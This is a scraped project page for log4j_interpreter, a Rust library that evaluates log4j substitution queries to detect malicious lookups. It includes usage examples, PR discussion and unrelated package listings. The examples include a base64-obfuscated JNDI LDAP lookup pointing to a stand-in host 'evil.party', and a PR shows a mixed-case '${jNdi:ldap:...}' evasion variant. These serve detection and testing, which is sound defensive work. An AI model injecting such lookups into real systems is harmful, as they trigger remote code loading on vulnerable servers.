A Rust library for evaluating log4j substitution queries in order to determine whether or not malicious queries may exist.

Related tags

Command-line log4j_interpreter
Overview

log4j_interpreter

A Rust library for evaluating log4j substitution queries in order to determine whether or not malicious queries may exist.

Limitations

Encoding

This tool assumes any log line has already been decoded before being passed to the tool. For example, if the log line is URL encoded or base64 encoded when it's passed to this tool, it will by pass the tool. Only fully decoded log lines should be passed to the tool.

Interpolation

This tool assumes it's operating on entire log lines at once. Should the processed lines be passed to additional log aggregators that interpolate values again, this tool does not capture cases where the interpolated values re-expose a vulnerability.

Test Executable

This package includes a test executable to which test strings can be passed on the command line.

Here is an example detecting an obfuscated use of jndi:.

$ ./log4j_interpreter
Usage: ./log4j_interpreter [test string]
$ ./log4j_interpreter 'hello ${base64:JHtqbmRpOmxkYXA6ZXZpbC5wYXJ0eX0=}'
Substituted: hello jndi:ldap:evil.party
JNDI: true
ENV: false
Recursion Limit: false

Here is an example that allows a benign string to pass:

$ ./log4j_interpreter 'a benign string ${base64:d2l0aCBzb21lIGJhc2U2NA==}'
Substituted: a benign string with some base64
JNDI: false
ENV: false
Recursion Limit: false
You might also like...
Parallel iteration of FASTA/FASTQ files, for when sequence order doesn't matter but speed does

Rust-parallelfastx A truly parallel parser for FASTA/FASTQ files. Principle The input file is memory-mapped then virtually split into N chunks. Each c

Rayan Chikhi 8 Oct 24, 2022
Poisson intensity of limit order execution, calibration of parameters A and k using level 1 tick data
Poisson intensity of limit order execution, calibration of parameters A and k using level 1 tick data

Poisson intensity of limit order execution, calibration of parameters A and k using level 1 tick data Description A limit order placed at a price St ±

0xCuteSocks 6 Apr 9, 2023
Like HashSet but retaining INSERTION order and without `Hash` requirement on the Element type.

identified_vec A collection of unique identifiable elements which retains insertion order, inspired by Pointfree's Swift Identified Collections. Simil

Alexander Cyon 4 Dec 11, 2023
Not the fastest terminal colors library. Don't even ask about size.
Not the fastest terminal colors library. Don't even ask about size.

TROLOLORS Not the fastest terminal colors library. Don't even ask about size. Why? Don't even try to use it. But maybe you need to say to your boss th

Dmitriy Kovalenko 15 Oct 27, 2021
Learning Rust through Advent of Code 2021 - probably not very clean!

AoC 2021 ======== I'm using AoC2021 as an excuse to learn Rust (and maybe some other languages). Please do *not* use this repository as a good source

Andrew Zhu 0 Dec 8, 2021
Use your computer as a cosmic ray detector! One of the memory errors Rust does not protect against.

Your computer can double up as a cosmic ray detector. Yes, really! Cosmic rays hit your computer all the time. If they hit the RAM, this can sometimes

Johanna Sörngård 110 Jun 16, 2023
Python package for topological data analysis written in Rust. Not limited to just H0 and H1.

Topological Data Analysis (TDA) Contents Installation Compiling from source Roadmap TDA is a python package for topological data analysis written in R

António Leitão 5 Feb 12, 2024
Display a random Shiba from your terminal whenever you feel the need to. Because why not?
Display a random Shiba from your terminal whenever you feel the need to. Because why not?

Shiba CLI Command-line interface (CLI) to display a random Shiba Inu whenever needed, by just running shiba on your terminal. How To Use • How Does It

null 17 Sep 25, 2022
xcp is a (partial) clone of the Unix cp command. It is not intended as a full replacement

xcp is a (partial) clone of the Unix cp command. It is not intended as a full replacement, but as a companion utility with some more user-friendly feedback and some optimisations that make sense under certain tasks (see below).

Steve Smith 310 Jan 5, 2023
Comments
  • handle alternate ASCII case for log4j lookups

    handle alternate ASCII case for log4j lookups

    this PR builds on #2. log4j handles ${jNdi:ldap:your.cool.hostname} the same way it handles a lower-case ${jNdi:ldap:your.cool.hostname}, and the parser should recognize this. it seems that case-insensitivity applies for all log4j lookups, but does not normalize over things like unicode characters that lower-case to a useful ASCII character.

    conveniently, this makes case-insensitive matching here pretty easy to add.

    opened by awortman-fastly 1
  • Add better date handling.

    Add better date handling.

    We had a report that some date fields weren't properly handled. This PR adds stronger date expansion support.

    New handlers were added by more closely investigating the log4j documentation around ${date:...}.

    • https://logging.apache.org/log4j/2.x/manual/lookups.html
    • https://docs.oracle.com/javase/6/docs/api/java/text/SimpleDateFormat.html
    opened by sw17ch 0
  • handle 'date' and 'main' lookups, expand 'env'

    handle 'date' and 'main' lookups, expand 'env'

    The logic for these lookups is simple and lossy, but that's acceptable since we can at least report that these lookups will be made. For some users it is reasonable to simply reject a log line at the presence of main or date, regardless of later findings. For other users, it doesn't seem possible to have a general transformation between a main or date lookup, and a string useful to build other more concerning lookup tokens (like jndi or env).

    edit: also adjusted the env expansion to assume that env vars are for undefined variables (so, expand to ""), but use a default value if one is provided - ${env:UNDEFINED:-hello} should expand to hello.

    opened by awortman-fastly 0
Owner
Fastly
Fastly
GitHub
A visual regex substitution tool

A visual regex substitution tool

Ilya Maximov 3 Feb 6, 2022
Socket Monitor: A prettier and simpler alternative to netstat or ss for socket monitoring with the ability to scan for malicious IP addresses.

?? Somo A prettier alternative to netstat or ss for socket monitoring. ⬇️ Installation: 1. Install cargo: From crates.io. 2. Install the somo crate: c

Theodor Peifer 13 Jun 6, 2023
This tool will profile official instances of OpenSUSE mirrorcache to determine the fastest repositories for your system

Mirror Magic tool to Magically make OpenSUSE Mirrors Magic-er This tool will profile official instances of OpenSUSE mirrorcache to determine the faste

Firstyear 30 Dec 22, 2022
Determine which CPU architecture is used in a binary file.

cpu_rec_rs Determine which CPU architecture is used in a binary file. Example: $ cpu_rec_rs /bin/bash /usr/lib/firmware/rtlwifi/rtl8821aefw* Loading c

Raphaël Rigo 61 Jun 27, 2023
Detects whether a terminal supports unicode.

Detects whether a terminal supports unicode. This crate is a Rust port mashing together @sindresorhus' is-unicode-supported and @iarna's has-unicode N

Kat Marchán 11 Jul 29, 2022
Detects whether a terminal supports color, and gives details about that support

Detects whether a terminal supports color, and gives details about that support. It takes into account the NO_COLOR environment variable. This crate i

Kat Marchán 30 Dec 29, 2022
Test whether a given stream is a terminal

is-terminal Test whether a given stream is a terminal is-terminal is a simple utility that answers one question: Is this a terminal? A "terminal", als

Dan Gohman 19 Dec 31, 2022
Source code for our paper "Higher-order finite elements for embedded simulation"

Higher-order Finite Elements for Embedded Simulation This repository contains the source code used to produce the results for our paper: Longva, A., L

Interactive Computer Graphics 18 Sep 30, 2022
Abuse the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code.

jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if t

Simone Margaritelli 301 Jan 4, 2023
Adapt the screen's color spectrum according to the hour of the day in order to improve your sleep

circadianlight What It Is Circadian Light is a program, currently only working on Linux with X, that controls the color spectrum of your screen accord

null 7 Dec 28, 2022